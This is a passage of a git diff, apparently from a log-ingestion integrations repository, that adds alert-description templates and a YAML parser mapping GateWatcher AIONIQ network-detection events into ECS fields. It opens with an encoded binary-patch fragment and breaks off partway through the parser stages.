zV*5IzTLsru?qQQM@Sayn>J8h^2>r82X;%z7g!9togLDYUv2%yelbsUuf}MylZ_n;JXDVZOU~?=| z3W6Bzm_o>~qo6OvxP+ou5$tOn!nN3|g1x?qUAY=LWuw=_z+TKAh48$c#%yb!6y2jEayg$GkC|k`R!G7BzydnFz z;gIZcLKwwruHmg-qXnc9)gP)r{jW55f* zTS5nr_LI`6anFzkg {destination.ip}:{destination.port})", + "conditions": [ + { + "field": "event.dataset", + "value": "network_metadata" + } + ] + }, + { + "value": "Authentication {event.module} : {gatewatcher.history.name} with {gatewatcher.history.ip}", + "conditions": [ + { + "field": "event.dataset", + "value": "network_metadata" + }, + { + "field": "event.module", + "value": "history" + } + ] + }, + { + "value": "{event.module} : {gatewatcher.syslog.message}", + "conditions": [ + { + "field": "event.dataset", + "value": "system_logs" + }, + { + "field": "event.module", + "value": "syslog" + } + ] + }, + { + "value": "{event.module} : {gatewatcher.notification.title}", + "conditions": [ + { + "field": "event.dataset", + "value": "administration" + }, + { + "field": "event.module", + "value": "notification" + } + ] + }, + { + "value": "{event.module} : {gatewatcher.beacon.hostname_resolution} on {network.protocol} ({source.ip}:{source.port} -> 
{destination.ip}:{destination.port})",
+ "conditions": [
+ {
+ "field": "event.dataset",
+ "value": "alert"
+ },
+ {
+ "field": "event.module",
+ "value": "beacon_detect"
+ }
+ ]
+ },
+ {
+ "value": "{event.module} : {gatewatcher.matched_event.file.name} ({source.ip}:{source.port} -> {destination.ip}:{destination.port})",
+ "conditions": [
+ {
+ "field": "event.dataset",
+ "value": "alert"
+ },
+ {
+ "field": "event.module",
+ "value": "retrohunt"
+ }
+ ]
+ },
+ {
+ "value": "{event.module} : {source.ip}:{source.port} -> {destination.ip}:{destination.port}",
+ "conditions": [
+ {
+ "field": "event.dataset",
+ "value": "alert"
+ },
+ {
+ "field": "event.module",
+ "value": "ransomware_detect"
+ }
+ ]
+ },
+ {
+ "value": "{event.module} : {source.ip}:{source.port} -> {destination.ip}:{destination.port}",
+ "conditions": [
+ {
+ "field": "event.dataset",
+ "value": "alert"
+ },
+ {
+ "field": "event.module",
+ "value": "dga_detect"
+ }
+ ]
+ },
+ {
+ "value": "{gatewatcher.nba.signature_severity} {event.module} : {gatewatcher.nba.signature} {source.ip}:{source.port} -> {destination.ip}:{destination.port}",
+ "conditions": [
+ {
+ "field": "event.dataset",
+ "value": "alert"
+ },
+ {
+ "field": "event.module",
+ "value": "network_behavior_analytics"
+ }
+ ]
+ },
+ {
+ "value": "{event.module} : {gatewatcher.ioc.signature}",
+ "conditions": [
+ {
+ "field": "event.dataset",
+ "value": "ioc"
+ },
+ {
+ "field": "event.module",
+ "value": "ioc"
+ }
+ ]
+ },
+ {
+ "value": "GCenter {event.module}",
+ "conditions": [
+ {
+ "field": "event.module",
+ "value": "sigflow_stats"
+ }
+ ]
+ },
+ {
+ "value": "{event.module} checker: {gatewatcher.malcore.state} file: {file.name} hosted on {url.domain} ({source.ip}:{source.port} -> {destination.ip}:{destination.port})",
+ "conditions": [
+ {
+ "field": "event.module",
+ "value": "malcore"
+ },
+ {
+ "field": "url.domain"
+ },
+ {
+ "field": "file.name"
+ },
+ {
+ "field": "source.address"
+ }
+ ]
+ },
+ {
+ "value": "{event.module}: 
{gatewatcher.sigflow.signature} (sid:{gatewatcher.sigflow.signature_id}) {rule.name} on {network.protocol} ({source.ip}:{source.port} -> {destination.ip}:{destination.port})",
+ "conditions": [
+ {
+ "field": "event.dataset",
+ "value": "alert"
+ },
+ {
+ "field": "event.module",
+ "value": "sigflow_alert"
+ }
+ ]
+ },
+ {
+ "value": "{event.module} of type {gatewatcher.shellcode.sub_type} detected ({source.ip}:{source.port} -> {destination.ip}:{destination.port})",
+ "conditions": [
+ {
+ "field": "event.module",
+ "value": "shellcode_detect"
+ }
+ ]
+ },
+ {
+ "value": "{event.module} with {gatewatcher.malicious_powershell.score} obfuscated chars ({source.ip}:{source.port} -> {destination.ip}:{destination.port})",
+ "conditions": [
+ {
+ "field": "event.module",
+ "value": "malicious_powershell_detect"
+ }
+ ]
+ }
+]
diff --git a/GateWatcher/aioniq_ecs/ingest/parser.yml b/GateWatcher/aioniq_ecs/ingest/parser.yml
new file mode 100644
index 000000000..8f53ec153
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/ingest/parser.yml
@@ -0,0 +1,768 @@
+name: gatewatcher-test-ecs---clem
+ignored_values: null
+pipeline:
+ - name: json_load
+ description: ''
+ filter: ''
+ external:
+ name: json.parse-json
+ properties:
+ input_field: '{{original.message}}'
+ output_field: message
+ - name: parsed_date
+ description: Parsed date
+ filter: ''
+ external: null
+ - name: event
+ description: event field
+ filter: ''
+ external: null
+ - name: source
+ description: source field
+ filter: ''
+ external: null
+ - name: destination
+ description: destination field
+ filter: ''
+ external: null
+ - name: observer
+ description: observer field
+ filter: ''
+ external: null
+ - name: network
+ description: network field
+ filter: ''
+ external: null
+ - name: http
+ description: http metadata fields
+ filter: ''
+ external: null
+ - name: file
+ description: file field
+ filter: ''
+ external: null
+ - name: dns
+ description: dns field metadata
+ filter: ''
+ external: null
+ - name: url
+ description: url field
+ filter: ''
+ external: null
+ - name: ecs
+ description: ecs field
+ filter: ''
+ external: null
+ - name: user_agent
+ description: user_agent field
+ filter: ''
+ external: null
+ - name: version
+ description: '@version field'
+ filter: ''
+ external: null
+ - name: tls
+ description: tls field
+ filter: ''
+ external: null
+ - name: metadata-flowbits
+ description: metadata flowbits field
+ filter: ''
+ external: null
+ - name: smtp
+ description: smtp field
+ filter: ''
+ external: null
+ - name: email
+ description: email field
+ filter: ''
+ external: null
+ - name: smb
+ description: smb field
+ filter: ''
+ external: null
+ - name: nfs
+ description: nfs field
+ filter: ''
+ external: null
+ - name: ftp
+ description: ftp field
+ filter: ''
+ external: null
+ - name: tftp
+ description: tftp field
+ filter: ''
+ external: null
+ - name: ssh
+ description: ssh field
+ filter: ''
+ external: null
+ - name: krb5
+ description: krb5 field
+ filter: ''
+ external: null
+ - name: dhcp
+ 
description: dhcp field
+ filter: ''
+ external: null
+ - name: ftp_data
+ description: ftp_data field
+ filter: ''
+ external: null
+ - name: snmp
+ description: snmp field
+ filter: ''
+ external: null
+ - name: rdp
+ description: rdp field
+ filter: ''
+ external: null
+ - name: rfb
+ description: rfb field
+ filter: ''
+ external: null
+ - name: ikev2
+ description: ikev 2 field
+ filter: ''
+ external: null
+ - name: sip
+ description: sip field
+ filter: ''
+ external: null
+ - name: dnp3
+ description: dnp3 field
+ filter: ''
+ external: null
+ - name: dcerpc
+ description: dcerpc field
+ filter: ''
+ external: null
+ - name: mqtt
+ description: mqtt field
+ filter: ''
+ external: null
+ - name: malcore
+ description: malcore field
+ filter: ''
+ external: null
+ - name: sigflow
+ description: sigflow field
+ filter: ''
+ external: null
+ - name: flow
+ description: flow field
+ filter: ''
+ external: null
+ - name: shellcode
+ description: shellcode field
+ filter: ''
+ external: null
+ - name: malicious_powershell
+ description: malicious_powershell field
+ filter: ''
+ external: null
+ - name: files
+ description: files field
+ filter: ''
+ external: null
+ - name: history
+ description: history field
+ filter: ''
+ external: null
+ - name: syslog
+ description: syslog field
+ filter: ''
+ external: null
+ - name: notification
+ description: notification field
+ filter: ''
+ external: null
+ - name: beacon
+ description: beacon field
+ filter: ''
+ external: null
+ - name: retrohunt
+ description: retrohunt field
+ filter: ''
+ external: null
+ - name: ransomware_detect
+ description: ransomware_detect field
+ filter: ''
+ external: null
+ - name: dga_detect
+ description: dga_detect field
+ filter: ''
+ external: null
+ - name: network_behavior_analytics
+ description: network_behavior_analytics field
+ filter: ''
+ external: null
+ - name: ioc
+ description: ioc field
+ filter: ''
+ external: null
+stages:
+ parsed_date:
+ actions:
+ - set:
+ 
'@timestamp': '{{json_load.message["@timestamp"]}}'
+ filter: ''
+ name: set
+ event:
+ actions:
+ - set:
+ event.kind: '{{json_load.message.event.kind}}'
+ event.module: '{{json_load.message.event.module}}'
+ event.dataset: '{{json_load.message.event.dataset}}'
+ event.category: '{{json_load.message.event.category}}'
+ event.severity: '{{json_load.message.event.severity}}'
+ gatewatcher.event.id: '{{json_load.message.event.id}}'
+ gatewatcher.event.created: '{{json_load.message.event.created}}'
+ filter: ''
+ name: set
+ source:
+ actions:
+ - set:
+ source.ip: '{{json_load.message.source.ip}}'
+ source.mac: '{{json_load.message.source.mac}}'
+ source.port: '{{json_load.message.source.port}}'
+ filter: ''
+ name: set
+ destination:
+ actions:
+ - set:
+ destination.ip: '{{json_load.message.destination.ip}}'
+ destination.mac: '{{json_load.message.destination.mac}}'
+ destination.port: '{{json_load.message.destination.port}}'
+ filter: ''
+ name: set
+ observer:
+ actions:
+ - set:
+ observer.vendor: '{{json_load.message.observer.vendor}}'
+ observer.product: '{{json_load.message.observer.product}}'
+ observer.version: '{{json_load.message.observer.version}}'
+ observer.hostname: '{{json_load.message.observer.hostname}}'
+ gatewatcher.observer.uuid: '{{json_load.message.observer.uuid}}'
+ gatewatcher.observer.gcap.version: '{{json_load.message.observer.gcap.version}}'
+ gatewatcher.observer.gcap.hostname: '{{json_load.message.observer.gcap.hostname}}'
+ gatewatcher.observer.log_format_version: '{{json_load.message.observer.log_format_version}}'
+ gatewatcher.observer.gcap.ingress.interface.name: '{{json_load.message.observer.gcap.ingress.interface.name}}'
+ filter: ''
+ name: set
+ network:
+ actions:
+ - set:
+ network.vlan.id: '{{json_load.message.network.vlan.id}}'
+ network.protocol: '{{json_load.message.network.protocol}}'
+ network.transport: '{{json_load.message.network.transport}}'
+ network.vlan.name: '{{json_load.message.network.vlan.name}}'
+ 
network.community_id: '{{json_load.message.network.community_id}}'
+ gatewatcher.network.tx_id: '{{json_load.message.network.tx_id}}'
+ gatewatcher.network.flow_id: '{{json_load.message.network.flow_id}}'
+ gatewatcher.network.timestamp: '{{json_load.message.network.timestamp}}'
+ filter: ''
+ name: set
+ http:
+ actions:
+ - set:
+ http.version: '{{json_load.message.http.version}}'
+ http.request.method: '{{json_load.message.http.request.method}}'
+ http.response.bytes: '{{json_load.message.http.response.bytes}}'
+ gatewatcher.http.http2: '{{json_load.message.http.http2}}'
+ http.request.mime_type: '{{json_load.message.http.request.mime_type}}'
+ gatewatcher.http.accept: '{{json_load.message.http.accept}}'
+ http.response.mime_type: '{{json_load.message.http.response.mime_type}}'
+ gatewatcher.http.hostname: '{{json_load.message.http.hostname}}'
+ http.response.status_code: '{{json_load.message.http.response.status}}'
+ gatewatcher.http.http_refer: '{{json_load.message.http.http_refer}}'
+ gatewatcher.http.accept_language: '{{json_load.message.http.accept_language}}'
+ filter: ''
+ name: set
+ file:
+ actions:
+ - set:
+ file.name: '{{json_load.message.file.name}}'
+ file.size: '{{json_load.message.file.size}}'
+ file.hash.md5: '{{json_load.message.file.hash.md5}}'
+ file.hash.sha1: '{{json_load.message.file.hash.sha1}}'
+ file.hash.sha256: '{{json_load.message.file.hash.sha256}}'
+ gatewatcher.file.sid: '{{json_load.message.file.sid}}'
+ gatewatcher.file.gaps: '{{json_load.message.file.gaps}}'
+ gatewatcher.file.magic: '{{json_load.message.file.magic}}'
+ gatewatcher.file.state: '{{json_load.message.file.state}}'
+ gatewatcher.file.tx_id: '{{json_load.message.file.tx_id}}'
+ gatewatcher.file.stored: '{{json_load.message.file.stored}}'
+ gatewatcher.file.file_id: '{{json_load.message.file.file_id}}'
+ filter: ''
+ name: set
+ dns:
+ actions:
+ - set:
+ gatewatcher.dns: '{{json_load.message.dns}}'
+ dns.answers.data: '{{json_load.message.dns.answers.data}}'
+ 
dns.answers.type: '{{json_load.message.dns.answers.type}}'
+ dns.response_code: '{{json_load.message.dns.response_code}}'
+ filter: ''
+ name: set
+ url:
+ actions:
+ - set:
+ url.full: '{{json_load.message.url.full}}'
+ url.path: '{{json_load.message.url.path}}'
+ url.domain: '{{json_load.message.url.domain}}'
+ filter: ''
+ name: set
+ ecs:
+ actions:
+ - set:
+ ecs.version: '{{json_load.message.ecs.version}}'
+ filter: ''
+ name: set
+ user_agent:
+ actions:
+ - set:
+ user_agent.name: '{{json_load.message.user_agent.name}}'
+ user_agent.os.name: '{{json_load.message.user_agent.os.name}}'
+ user_agent.version: '{{json_load.message.user_agent.version}}'
+ user_agent.original: '{{json_load.message.user_agent.original}}'
+ user_agent.os.family: '{{json_load.message.user_agent.os.family}}'
+ user_agent.os.version: '{{json_load.message.user_agent.os.version}}'
+ user_agent.device.name: '{{json_load.message.user_agent.device.name}}'
+ gatewatcher.user_agent.major: '{{json_load.message.user_agent.major}}'
+ gatewatcher.user_agent.minor: '{{json_load.message.user_agent.minor}}'
+ gatewatcher.user_agent.patch: '{{json_load.message.user_agent.patch}}'
+ gatewatcher.user_agent.os.major: '{{json_load.message.user_agent.os.major}}'
+ filter: ''
+ name: set
+ version:
+ actions:
+ - set:
+ gatewatcher.version: '{{json_load.message["@version"]}}'
+ filter: ''
+ name: set
+ tls:
+ actions:
+ - set:
+ tls.version: '{{json_load.message.tls.version}}'
+ gatewatcher.tls: '{{json_load.message.tls}}'
+ tls.server.issuer: '{{json_load.message.tls.server.issuer}}'
+ tls.server.subject: '{{json_load.message.tls.server.subject}}'
+ tls.server.hash.md5: '{{json_load.message.tls.server.hash.md5}}'
+ tls.server.hash.sha1: '{{json_load.message.tls.server.hash.sha1}}'
+ tls.client.server_name: '{{json_load.message.tls.client.server_name}}'
+ tls.server.certificate: '{{json_load.message.tls.server.certificate}}'
+ tls.server.hash.sha256: '{{json_load.message.tls.server.hash.sha256}}'
+ 
tls.server.certificate_chain: '{{json_load.message.tls.server.certificate.chain}}'
+ filter: ''
+ name: set
+ metadata-flowbits:
+ actions:
+ - set:
+ gatewatcher.metadata.flowbits: '{{json_load.message.metadata.flowbits}}'
+ filter: ''
+ name: set
+ smtp:
+ actions:
+ - set:
+ gatewatcher.smtp.helo: '{{json_load.message.smtp.helo}}'
+ gatewatcher.smtp.rcpt_to: '{{json_load.message.smtp.rcpt_to}}'
+ gatewatcher.smtp.mail_from: '{{json_load.message.smtp.mail_from}}'
+ filter: ''
+ name: set
+ email:
+ actions:
+ - set:
+ email.subject: '{{json_load.message.email.subject}}'
+ email.message_id: '{{json_load.message.email.message_id}}'
+ email.attachments: '{{json_load.message.email.attachments}}'
+ gatewatcher.email.to: '{{json_load.message.email.to}}'
+ gatewatcher.email.from: '{{json_load.message.email.from}}'
+ gatewatcher.email.status: '{{json_load.message.email.status}}'
+ gatewatcher.email.body_md5: '{{json_load.message.email.body_md5}}'
+ gatewatcher.email.subject_md5: '{{json_load.message.email.subject_md5}}'
+ filter: ''
+ name: set
+ smb:
+ actions:
+ - set:
+ gatewatcher.smb.id: '{{json_load.message.smb.id}}'
+ gatewatcher.smb.status: '{{json_load.message.smb.status}}'
+ gatewatcher.smb.command: '{{json_load.message.smb.command}}'
+ gatewatcher.smb.dialect: '{{json_load.message.smb.dialect}}'
+ gatewatcher.smb.tree_id: '{{json_load.message.smb.tree_id}}'
+ gatewatcher.smb.session_id: '{{json_load.message.smb.session_id}}'
+ gatewatcher.smb.status_code: '{{json_load.message.smb.status_code}}'
+ filter: ''
+ name: set
+ nfs:
+ actions:
+ - set:
+ gatewatcher.nfs.id: '{{json_load.message.nfs.id}}'
+ gatewatcher.nfs.type: '{{json_load.message.nfs.type}}'
+ gatewatcher.nfs.hhash: '{{json_load.message.nfs.hhash}}'
+ gatewatcher.nfs.status: '{{json_load.message.nfs.status}}'
+ gatewatcher.nfs.file_tx: '{{json_load.message.nfs.file_tx}}'
+ gatewatcher.nfs.version: '{{json_load.message.nfs.version}}'
+ gatewatcher.nfs.filename: '{{json_load.message.nfs.filename}}'
+ 
gatewatcher.nfs.procedure: '{{json_load.message.nfs.procedure}}'
+ filter: ''
+ name: set
+ ftp:
+ actions:
+ - set:
+ gatewatcher.ftp.reply: '{{json_load.message.ftp.reply}}'
+ gatewatcher.ftp.reply_received: '{{json_load.message.ftp.reply_received}}'
+ gatewatcher.ftp.completion_code: '{{json_load.message.ftp.completion_code}}'
+ gatewatcher.ftp.reply_truncated: '{{json_load.message.ftp.reply_truncated}}'
+ filter: ''
+ name: set
+ tftp:
+ actions:
+ - set:
+ gatewatcher.tftp.file: '{{json_load.message.tftp.file}}'
+ gatewatcher.tftp.mode: '{{json_load.message.tftp.mode}}'
+ gatewatcher.tftp.packet: '{{json_load.message.tftp.packet}}'
+ filter: ''
+ name: set
+ ssh:
+ actions:
+ - set:
+ gatewatcher.ssh.client.hassh: '{{json_load.message.ssh.client.hassh}}'
+ gatewatcher.ssh.server.hassh: '{{json_load.message.ssh.server.hassh}}'
+ gatewatcher.ssh.client.proto_version: '{{json_load.message.ssh.client.proto_version}}'
+ gatewatcher.ssh.server.proto_version: '{{json_load.message.ssh.server.proto_version}}'
+ gatewatcher.ssh.client.software_version: '{{json_load.message.ssh.client.software_version}}'
+ gatewatcher.ssh.server.software_version: '{{json_load.message.ssh.server.software_version}}'
+ filter: ''
+ name: set
+ krb5:
+ actions:
+ - set:
+ gatewatcher.krb5.cname: '{{json_load.message.krb5.cname}}'
+ gatewatcher.krb5.realm: '{{json_load.message.krb5.realm}}'
+ gatewatcher.krb5.sname: '{{json_load.message.krb5.sname}}'
+ gatewatcher.krb5.msg_type: '{{json_load.message.krb5.msg_type}}'
+ gatewatcher.krb5.encryption: '{{json_load.message.krb5.encryption}}'
+ gatewatcher.krb5.error_code: '{{json_load.message.krb5.error_code}}'
+ gatewatcher.krb5.failed_request: '{{json_load.message.krb5.failed_request}}'
+ gatewatcher.krb5.weak_encryption: '{{json_load.message.krb5.weak_encryption}}'
+ filter: ''
+ name: set
+ dhcp:
+ actions:
+ - set:
+ gatewatcher.dhcp.id: '{{json_load.message.dhcp.id}}'
+ gatewatcher.dhcp.type: '{{json_load.message.dhcp.type}}'
+ 
gatewatcher.dhcp.routers: '{{json_load.message.dhcp.routers}}'
+ gatewatcher.dhcp.hostname: '{{json_load.message.dhcp.hostname}}'
+ gatewatcher.dhcp.relay_ip: '{{json_load.message.dhcp.relay_ip}}'
+ gatewatcher.dhcp.client_ip: '{{json_load.message.dhcp.client_ip}}'
+ gatewatcher.dhcp.dhcp_type: '{{json_load.message.dhcp.dhcp_type}}'
+ gatewatcher.dhcp.client_mac: '{{json_load.message.dhcp.client_mac}}'
+ gatewatcher.dhcp.lease_time: '{{json_load.message.dhcp.lease_time}}'
+ gatewatcher.dhcp.assigned_ip: '{{json_load.message.dhcp.assigned_ip}}'
+ gatewatcher.dhcp.dns_servers: '{{json_load.message.dhcp.dns_servers}}'
+ gatewatcher.dhcp.subnet_mask: '{{json_load.message.dhcp.subnet_mask}}'
+ gatewatcher.dhcp.next_server_ip: '{{json_load.message.dhcp.next_server_ip}}'
+ filter: ''
+ name: set
+ ftp_data:
+ actions:
+ - set:
+ gatewatcher.ftp_data.command: '{{json_load.message.ftp_data.command}}'
+ gatewatcher.ftp_data.filename: '{{json_load.message.ftp_data.filename}}'
+ filter: ''
+ name: set
+ snmp:
+ actions:
+ - set:
+ gatewatcher.snmp.vars: '{{json_load.message.snmp.vars}}'
+ gatewatcher.snmp.version: '{{json_load.message.snmp.version}}'
+ gatewatcher.snmp.pdu_type: '{{json_load.message.snmp.pdu_type}}'
+ gatewatcher.snmp.community: '{{json_load.message.snmp.community}}'
+ filter: ''
+ name: set
+ rdp:
+ actions:
+ - set:
+ gatewatcher.rdp.tx_id: '{{json_load.message.rdp.tx_id}}'
+ gatewatcher.rdp.client: '{{json_load.message.rdp.client}}'
+ gatewatcher.rdp.cookie: '{{json_load.message.rdp.cookie}}'
+ gatewatcher.rdp.channels: '{{json_load.message.rdp.channels}}'
+ gatewatcher.rdp.protocol: '{{json_load.message.rdp.protocol}}'
+ gatewatcher.rdp.event_type: '{{json_load.message.rdp.event_type}}'
+ gatewatcher.rdp.server_supports: '{{json_load.message.rdp.server_supports}}'
+ filter: ''
+ name: set
+ rfb:
+ actions:
+ - set:
+ gatewatcher.rfb.authentication: '{{json_load.message.rfb.authentication}}'
+ gatewatcher.rfb.client_protocol_version: 
'{{json_load.message.rfb.client_protocol_version}}'
+ gatewatcher.rfb.server_protocol_version: '{{json_load.message.rfb.server_protocol_version}}'
+ gatewatcher.rfb.server_security_failure_reason: '{{json_load.message.rfb.server_security_failure_reason}}'
+ filter: ''
+ name: set
+ ikev2:
+ actions:
+ - set:
+ gatewatcher.ikev2.role: '{{json_load.message.ikev2.role}}'
+ gatewatcher.ikev2.errors: '{{json_load.message.ikev2.errors}}'
+ gatewatcher.ikev2.notify: '{{json_load.message.ikev2.notify}}'
+ gatewatcher.ikev2.payload: '{{json_load.message.ikev2.payload}}'
+ gatewatcher.ikev2.init_spi: '{{json_load.message.ikev2.init_spi}}'
+ gatewatcher.ikev2.resp_spi: '{{json_load.message.ikev2.resp_spi}}'
+ gatewatcher.ikev2.message_id: '{{json_load.message.ikev2.message_id}}'
+ gatewatcher.ikev2.exchange_type: '{{json_load.message.ikev2.exchange_type}}'
+ gatewatcher.ikev2.version_major: '{{json_load.message.ikev2.version_major}}'
+ gatewatcher.ikev2.version_minor: '{{json_load.message.ikev2.version_minor}}'
+ filter: ''
+ name: set
+ sip:
+ actions:
+ - set:
+ gatewatcher.sip.uri: '{{json_load.message.sip.uri}}'
+ gatewatcher.sip.method: '{{json_load.message.sip.method}}'
+ gatewatcher.sip.version: '{{json_load.message.sip.version}}'
+ gatewatcher.sip.request_line: '{{json_load.message.sip.request_line}}'
+ filter: ''
+ name: set
+ dnp3:
+ actions:
+ - set:
+ gatewatcher.dnp3.dst: '{{json_load.message.dnp3.dst}}'
+ gatewatcher.dnp3.iin: '{{json_load.message.dnp3.iin}}'
+ gatewatcher.dnp3.src: '{{json_load.message.dnp3.src}}'
+ gatewatcher.dnp3.type: '{{json_load.message.dnp3.type}}'
+ gatewatcher.dnp3.control: '{{json_load.message.dnp3.control}}'
+ gatewatcher.dnp3.application: '{{json_load.message.dnp3.application}}'
+ filter: ''
+ name: set
+ dcerpc:
+ actions:
+ - set:
+ gatewatcher.dcerpc.req: '{{json_load.message.dcerpc.req}}'
+ gatewatcher.dcerpc.res: '{{json_load.message.dcerpc.res}}'
+ gatewatcher.dcerpc.call_id: '{{json_load.message.dcerpc.call_id}}'
+ 
gatewatcher.dcerpc.request: '{{json_load.message.dcerpc.request}}'
+ gatewatcher.dcerpc.response: '{{json_load.message.dcerpc.response}}'
+ gatewatcher.dcerpc.interfaces: '{{json_load.message.dcerpc.interfaces}}'
+ gatewatcher.dcerpc.rpc_version: '{{json_load.message.dcerpc.rpc_version}}'
+ filter: ''
+ name: set
+ mqtt:
+ actions:
+ - set:
+ gatewatcher.mqtt.connack: '{{json_load.message.mqtt.connack}}'
+ filter: ''
+ name: set
+ malcore:
+ actions:
+ - set:
+ gatewatcher.malcore.code: '{{json_load.message.malcore.code}}'
+ gatewatcher.malcore.state: '{{json_load.message.malcore.state}}'
+ gatewatcher.malcore.engine_id: '{{json_load.message.malcore.engine_id}}'
+ gatewatcher.malcore.file_type: '{{json_load.message.malcore.file_type}}'
+ gatewatcher.malcore.total_found: '{{json_load.message.malcore.total_found}}'
+ gatewatcher.malcore.analyzers_up: '{{json_load.message.malcore.analyzers_up}}'
+ gatewatcher.malcore.magic_details: '{{json_load.message.malcore.magic_details}}'
+ gatewatcher.malcore.analyzed_clean: '{{json_load.message.malcore.analyzed_clean}}'
+ gatewatcher.malcore.analyzed_error: '{{json_load.message.malcore.analyzed_error}}'
+ gatewatcher.malcore.analyzed_other: '{{json_load.message.malcore.analyzed_other}}'
+ gatewatcher.malcore.processing_time: '{{json_load.message.malcore.processing_time}}'
+ gatewatcher.malcore.reporting_token: '{{json_load.message.malcore.reporting_token}}'
+ gatewatcher.malcore.detail_scan_time: '{{json_load.message.malcore.detail_scan_time}}'
+ gatewatcher.malcore.detail_wait_time: '{{json_load.message.malcore.detail_wait_time}}'
+ gatewatcher.malcore.analyzed_infected: '{{json_load.message.malcore.analyzed_infected}}'
+ gatewatcher.malcore.analyzed_suspicious: '{{json_load.message.malcore.analyzed_suspicious}}'
+ gatewatcher.malcore.detail_threat_found: '{{json_load.message.malcore.detail_threat_found}}'
+ gatewatcher.malcore.file_type_description: '{{json_load.message.malcore.file_type_description}}'
+ 
gatewatcher.malcore.engines_last_update_date: '{{json_load.message.malcore.engines_last_update_date}}' + filter: '' + name: set + sigflow: + actions: + - set: + gatewatcher.sigflow.gid: '{{json_load.message.sigflow.gid}}' + gatewatcher.sigflow.rev: '{{json_load.message.sigflow.rev}}' + gatewatcher.sigflow.action: '{{json_load.message.sigflow.action}}' + gatewatcher.sigflow.packet: '{{json_load.message.sigflow.packet}}' + gatewatcher.sigflow.stream: '{{json_load.message.sigflow.stream}}' + gatewatcher.sigflow.payload: '{{json_load.message.sigflow.payload}}' + gatewatcher.sigflow.category: '{{json_load.message.sigflow.category}}' + gatewatcher.sigflow.metadata: '{{json_load.message.sigflow.metadata}}' + gatewatcher.sigflow.signature: '{{json_load.message.sigflow.signature}}' + gatewatcher.sigflow.packet_info: '{{json_load.message.sigflow.packet_info}}' + gatewatcher.sigflow.signature_id: '{{json_load.message.sigflow.signature_id}}' + gatewatcher.sigflow.payload_printable: '{{json_load.message.sigflow.payload_printable}}' + filter: '' + name: set + flow: + actions: + - set: + gatewatcher.flow.start: '{{json_load.message.flow.start}}' + gatewatcher.flow.pkts_toclient: '{{json_load.message.flow.pkts_toclient}}' + gatewatcher.flow.pkts_toserver: '{{json_load.message.flow.pkts_toserver}}' + gatewatcher.flow.bytes_toclient: '{{json_load.message.flow.bytes_toclient}}' + gatewatcher.flow.bytes_toserver: '{{json_load.message.flow.bytes_toserver}}' + filter: '' + name: set + shellcode: + actions: + - set: + gatewatcher.shellcode.id: '{{json_load.message.shellcode.id}}' + gatewatcher.shellcode.analysis: '{{json_load.message.shellcode.analysis}}' + gatewatcher.shellcode.sub_type: '{{json_load.message.shellcode.sub_type}}' + gatewatcher.shellcode.encodings: '{{json_load.message.shellcode.encodings}}' + gatewatcher.shellcode.sample_id: '{{json_load.message.shellcode.sample_id}}' + filter: '' + name: set + malicious_powershell: + actions: + - set: + 
gatewatcher.malicious_powershell.id: '{{json_load.message.malicious_powershell.id}}' + gatewatcher.malicious_powershell.score: '{{json_load.message.malicious_powershell.score}}' + gatewatcher.malicious_powershell.sample_id: '{{json_load.message.malicious_powershell.sample_id}}' + gatewatcher.malicious_powershell.score_details: '{{json_load.message.malicious_powershell.score_details}}' + gatewatcher.malicious_powershell.proba_obfuscated: '{{json_load.message.malicious_powershell.proba_obfuscated}}' + filter: '' + name: set + files: + actions: + - set: + gatewatcher.files: '{{json_load.message.files}}' + filter: '' + name: set + history: + actions: + - set: + gatewatcher.history.id: '{{json_load.message.history.id}}' + gatewatcher.history.ip: '{{json_load.message.history.ip}}' + gatewatcher.history.code: '{{json_load.message.history.code}}' + gatewatcher.history.name: '{{json_load.message.history.name}}' + gatewatcher.history.type: '{{json_load.message.history.type}}' + gatewatcher.history.method: '{{json_load.message.history.method}}' + gatewatcher.history.content: '{{json_load.message.history.content}}' + gatewatcher.history.endpoint: '{{json_load.message.history.endpoint}}' + filter: '' + name: set + syslog: + actions: + - set: + log.syslog.appname: '{{json_load.message.log.syslog.appname}}' + log.syslog.priority: '{{json_load.message.log.syslog.priority}}' + log.syslog.facility.code: '{{json_load.message.log.syslog.facility.code}}' + log.syslog.facility.name: '{{json_load.message.log.syslog.facility.name}}' + log.syslog.severity.code: '{{json_load.message.log.syslog.severity.code}}' + log.syslog.severity.name: '{{json_load.message.log.syslog.severity.name}}' + gatewatcher.syslog.message: '{{json_load.message.syslog.message}}' + filter: '' + name: set + notification: + actions: + - set: + gatewatcher.notification.risk: '{{json_load.message.notification.risk}}' + gatewatcher.notification.title: '{{json_load.message.notification.title}}' + 
gatewatcher.notification.details: '{{json_load.message.notification.details}}' + gatewatcher.notification.component: '{{json_load.message.notification.component}}' + gatewatcher.notification.resolution: '{{json_load.message.notification.resolution}}' + gatewatcher.notification.description: '{{json_load.message.notification.description}}' + gatewatcher.notification.external_redirection: '{{json_load.message.notification.external_redirection}}' + gatewatcher.notification.internal_redirection: '{{json_load.message.notification.internal_redirection}}' + filter: '' + name: set + beacon: + actions: + - set: + gatewatcher.beacon.id: '{{json_load.message.beacon.external_redirection}}' + gatewatcher.beacon.type: '{{json_load.message.beacon.type}}' + gatewatcher.beacon.active: '{{json_load.message.beacon.active}}' + gatewatcher.beacon.possible_cnc: '{{json_load.message.beacon.possible_cnc}}' + gatewatcher.beacon.session_count: '{{json_load.message.beacon.session_count}}' + gatewatcher.beacon.mean_time_interval: '{{json_load.message.beacon.mean_time_interval}}' + gatewatcher.beacon.hostname_resolution: '{{json_load.message.beacon.hostname_resolution}}' + filter: '' + name: set + retrohunt: + actions: + - set: + gatewatcher.matched_event.id: '{{json_load.message.matched_event.id}}' + gatewatcher.matched_event.file.sid: '{{json_load.message.matched_event.file.sid}}' + gatewatcher.matched_event.file.gaps: '{{json_load.message.matched_event.file.gaps}}' + gatewatcher.matched_event.file.name: '{{json_load.message.matched_event.file.name}}' + gatewatcher.matched_event.file.size: '{{json_load.message.matched_event.file.size}}' + gatewatcher.matched_event.file.magic: '{{json_load.message.matched_event.file.magic}}' + gatewatcher.matched_event.file.state: '{{json_load.message.matched_event.file.state}}' + gatewatcher.matched_event.file.tx_id: '{{json_load.message.matched_event.file.tx_id}}' + gatewatcher.matched_event.file.stored: '{{json_load.message.matched_event.file.stored}}' + 
